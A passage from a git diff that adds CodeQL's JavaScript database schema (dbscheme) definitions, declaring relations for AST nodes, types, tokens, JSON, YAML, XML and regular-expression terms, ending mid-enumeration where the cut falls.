+unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..c88c69174bd0 --- /dev/null +++ b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme @@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = 